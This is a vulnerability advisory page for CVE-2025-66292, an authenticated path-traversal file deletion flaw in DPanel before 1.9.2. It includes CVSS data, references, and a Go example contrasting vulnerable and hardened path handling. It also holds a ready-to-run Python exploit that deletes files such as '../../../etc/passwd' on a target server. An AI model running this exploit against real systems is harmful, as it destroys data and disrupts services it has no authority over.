Security Vulnerability Report
CVE-2025-66292 CVSS 8.1 HIGH

CVE-2025-66292

Published: 2026-01-15 17:16:05
Last Modified: 2026-03-12 18:07:07

Description

DPanel is an open source server management panel written in Go. Prior to 1.9.2, DPanel has an arbitrary file deletion vulnerability in the /api/common/attach/delete interface: an authenticated user can delete arbitrary files on the server via path traversal. Once a user is logged into the administrative backend, this interface can be used to delete files. The vulnerability lies in the Delete function in app/common/http/controller/attach.go. The user-supplied path parameter is passed directly to storage.Local{}.GetSaveRealPath and then to os.Remove without sanitization or any check for path traversal sequences (../), and the helper function in common/service/storage/local.go uses filepath.Join, which collapses ../ segments but does not enforce a chroot/jail, so the joined path can resolve to any location the panel process is permitted to unlink. This matches the CVSS vector below (C:N/I:H/A:H): nothing is read back, but files are destroyed. This vulnerability is fixed in 1.9.2.
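The following Go program is an added illustration of the pattern the description names, not DPanel's own code: a "resolve" helper that only calls filepath.Join (which cleans ../ but never checks containment) placed beside a hardened version that re-checks the cleaned result against the storage root with filepath.Rel before anything is passed to os.Remove. The root directory, the attachment names and the function names are assumptions for the example.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned when a user-supplied path escapes the storage root.
var ErrOutsideRoot = errors.New("path escapes storage root")

// vulnerableRealPath reconstructs the pattern the advisory describes
// (illustrative, not DPanel's code): filepath.Join runs Clean, which
// collapses "../" segments, but nothing keeps the result under root, so
// "../../etc/passwd" resolves to a path outside root.
func vulnerableRealPath(root, userPath string) string {
	return filepath.Join(root, userPath)
}

// safeRealPath joins the same way and then verifies the cleaned result is
// still inside root. filepath.Rel is used instead of a naive strings.HasPrefix
// so that a sibling directory such as "/data/attachments-old" is not mistaken
// for being inside "/data/attachments". The root itself (rel == ".") is
// rejected too: deleting the storage root is never a valid attachment delete.
func safeRealPath(root, userPath string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	candidate := filepath.Join(absRoot, userPath) // Join also runs Clean
	rel, err := filepath.Rel(absRoot, candidate)
	if err != nil {
		return "", err
	}
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return candidate, nil
}

// deleteAttachment is the hardened counterpart of the handler flow in the
// advisory: resolve, check containment, and only then call os.Remove.
func deleteAttachment(root, userPath string) error {
	real, err := safeRealPath(root, userPath)
	if err != nil {
		return err
	}
	return os.Remove(real)
}

func main() {
	// Assumed storage root and a mix of benign and traversal inputs.
	root := "/data/attachments"
	inputs := []string{"report.pdf", "sub/../report.pdf", "../../etc/passwd", "..", "", "/etc/passwd"}
	for _, p := range inputs {
		fmt.Printf("%-20q join only -> %s\n", p, vulnerableRealPath(root, p))
		if safe, err := safeRealPath(root, p); err != nil {
			fmt.Printf("%-20q checked   -> rejected: %v\n", p, err)
		} else {
			fmt.Printf("%-20q checked   -> %s\n", p, safe)
		}
	}
}
```

Note that a leading slash does not escape on its own: filepath.Join treats "/etc/passwd" as a relative component and yields "/data/attachments/etc/passwd", so the dangerous inputs are the ones with ".." segments. The containment check is a string-level check on the cleaned path; it does not follow symlinks, which is acceptable for os.Remove (unlinking a symlink removes the link, not its target) but would not be sufficient on its own for a read or write primitive.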

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dpanel:dpanel:*:*:*:*:*:go:*:* - VULNERABLE
DPanel < 1.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-66292 DPanel Arbitrary File Deletion PoC
# Target: DPanel < 1.9.2
# Endpoint: /api/common/attach/delete


def delete_file(target_url, username, password, file_to_delete):
    """
    Delete arbitrary file on DPanel server via path traversal

    Args:
        target_url: Base URL of DPanel (e.g., http://target.com:22222)
        username: Valid username for authentication
        password: Password for the user
        file_to_delete: File path to delete (can use ../ for traversal)
    """
    # Step 1: Login to get session
    login_url = f"{target_url}/api/user/login"
    login_data = {
        "username": username,
        "password": password
    }
    session = requests.Session()
    try:
        login_response = session.post(login_url, json=login_data, timeout=10)
        if login_response.status_code != 200:
            print(f"[-] Login failed with status code: {login_response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error during login: {e}")
        return False

    # Step 2: Exploit path traversal to delete arbitrary file
    delete_url = f"{target_url}/api/common/attach/delete"
    delete_data = {
        "path": file_to_delete  # e.g., "../../../etc/passwd" or "../../../var/log/syslog"
    }
    try:
        delete_response = session.post(delete_url, json=delete_data, timeout=10)
        if delete_response.status_code == 200:
            result = delete_response.json()
            if result.get('code') == 0:
                print(f"[+] Successfully deleted: {file_to_delete}")
                return True
            else:
                print(f"[-] Delete failed: {result.get('message')}")
                return False
        else:
            print(f"[-] Request failed with status code: {delete_response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error during delete: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-66292.py <target_url> <username> <password> <file_to_delete>")
        print("Example: python cve-2025-66292.py http://target.com:22222 admin admin123 '../../../etc/passwd'")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    print(f"[*] Target: {target}")
    print(f"[*] Target file: {file_path}")
    delete_file(target, user, pwd, file_path)

References

https://github.com/donknap/dpanel/commit/cbda0d90204e8212f2010774345c952e42069119 (Patch)
https://github.com/donknap/dpanel/releases/tag/v1.9.2 (Release Notes)
https://github.com/donknap/dpanel/security/advisories/GHSA-vh2x-fw87-4fxq (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66292",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-15T17:16:04.570",
    "lastModified": "2026-03-12T18:07:07.010",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "DPanel is an open source server management panel written in Go. Prior to 1.9.2, DPanel has an arbitrary file deletion vulnerability in the /api/common/attach/delete interface. Authenticated users can delete arbitrary files on the server via path traversal. When a user logs into the administrative backend, this interface can be used to delete files. The vulnerability lies in the Delete function within the app/common/http/controller/attach.go file. The path parameter submitted by the user is directly passed to storage.Local{}.GetSaveRealPath and subsequently to os.Remove without proper sanitization or checking for path traversal characters (../). And the helper function in common/service/storage/local.go uses filepath.Join, which resolves ../ but does not enforce a chroot/jail. This vulnerability is fixed in 1.9.2."
      },
      {
        "lang": "es",
        "value": "DPanel is an open source server management panel written in Go. Prior to 1.9.2, DPanel has an arbitrary file deletion vulnerability in the /api/common/attach/delete interface. Authenticated users can delete arbitrary files on the server via path traversal. When a user logs into the administrative backend, this interface can be used to delete files. The vulnerability lies in the Delete function within the app/common/http/controller/attach.go file. The path parameter sent by the user is passed directly to storage.Local{}.GetSaveRealPath and subsequently to os.Remove without proper sanitization or checking for path traversal characters (../). And the helper function in common/service/storage/local.go uses filepath.Join, which resolves ../ but does not enforce a chroot/jail. This vulnerability is fixed in 1.9.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"},
          {"lang": "en", "value": "CWE-73"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:dpanel:dpanel:*:*:*:*:*:go:*:*",
                "versionEndExcluding": "1.9.2",
                "matchCriteriaId": "2B472AD9-9206-4EA4-A7BE-3FFA42B28FE9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/donknap/dpanel/commit/cbda0d90204e8212f2010774345c952e42069119",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/donknap/dpanel/releases/tag/v1.9.2",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/donknap/dpanel/security/advisories/GHSA-vh2x-fw87-4fxq",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}